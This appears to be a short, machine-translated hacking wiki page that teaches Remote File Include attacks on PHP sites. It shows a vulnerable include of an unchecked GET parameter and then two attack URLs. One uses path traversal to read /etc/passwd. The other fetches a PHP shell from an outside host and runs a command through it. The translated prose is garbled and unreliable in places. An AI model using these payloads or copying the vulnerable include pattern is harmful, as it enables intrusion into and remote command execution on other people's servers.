HOWTO-HACK - Attack with Remote File Include (RFI)

From wiki.morphey.org

Jump to: navigation, search

This type of vulnerability, is usual in the sites web with many it includes. We put for instance that I have an it includes in index.php of the type: 

 
<?
// ....
 
$page = $_GET['section'];
include($page);
 
// rest of the page
?>
 

it is clear that if we put an any run inside the varying GET "section", this will be taken as page by to include and here are the done games: 

 
http://[site_vuln]/index.php?section=../../../etc/passwd
 

With this url in the point of the page where it is I introduce it includes him, we will see the list of all the consumers of the car. Beautiful it is? :)

If we have a shell php, we can include her in this way: 

 
http://[site_vuln]/index.php?section=http://myurl.com/myshell.txt?cmd=uname
 

and in the point of the it includes some page we will see the result.

Retrieved from "http://wiki.morphey.org/index.php/HOWTO-HACK_-_Attack_with_Remote_File_Include_%28RFI%29"
Personal tools